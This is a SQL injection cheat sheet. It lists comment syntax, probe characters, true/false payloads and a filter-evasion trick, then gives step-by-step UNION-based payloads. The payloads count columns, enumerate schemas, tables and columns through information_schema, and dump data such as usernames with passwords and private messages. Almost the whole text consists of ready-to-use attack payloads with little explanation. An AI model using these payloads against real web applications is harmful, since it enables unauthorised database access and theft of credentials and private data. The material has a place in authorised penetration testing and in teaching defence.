Identifying SQL Injection Vulnerability Parameters
Comments in SQL
-- MySQL Linux style
--+ MySQL Windows style
# Hash (URL encode while use)
--+- SQL comment
;%00 Null Byte
` Backtick
To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include:
id=[Nothing]
id='
id=''
id="
id=`
id=')
id=")
id=`)
id='))
id="))
id=`))
Examples of SQL Injection Testing
Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include:
1 or 1=1 -- true
1' or 1=1 -- true
1" or 1=1 -- true
1 and 1=2 -- false
-- Example: id=1'OR+1=1+--
Obfuscating SQL for evading detection mechanisms or filters in certain environments
SELECT/**//*FROM/**/users/**/WHERE/**/username/**/='admin';
Finding the Number of Columns
Identifying the number of columns is crucial for successful exploitation. Use the group by clause to determine the column count:
Method 1: Error-Based Approach
group by 1,2,3,4,5,6,7,8,9 --
-- Example: id=group+by+1,2,3,4,5,6,7,8,9+--
Method 2: Union-Based Approach
UNION ALL SELECT 1,2,3,4,5,6,7,8,9 --
-- Example: id=UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9+--
Retrieving Table Names
Once you know the number of columns, you can extract information such as schema names:
Error-Based Approach to find Databases
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata --
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,schema_name,0x7c),2,3,4+fRoM+information_schema.schemata+--
-- This example when we have 4 columns
Exploring found Databases to find tables
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...+--
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,table_name,0x7C),2,3,4+fRoM+information_schema.tables+wHeRe+table_schema='school'+--
Exploring founded Tables to columns
Suppose we find, users, accounting, id, email, in school Tables:
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,column_name,0x7C),2,3,4+fRoM+information_schema.columns+wHeRe+table_name='users'+--
It’s the same as describing users.
Now we’ve got our Table columns name, table name so, it’s time to view content:
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...{DB_name}.{table_name}+--
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,username,':',password,0x7C),2,3,4+fRoM+school.users+--
If DB_Name = mango Table_Name = messages columns_Name is = id, user_from, user_to, message_content. Then, to dump content
UniOn+Select+gRoUp_cOncaT(0x7c,id,':',user_from,':',user_to,':',message_content,0x7C),2,3,4+fRoM+mango.messages+--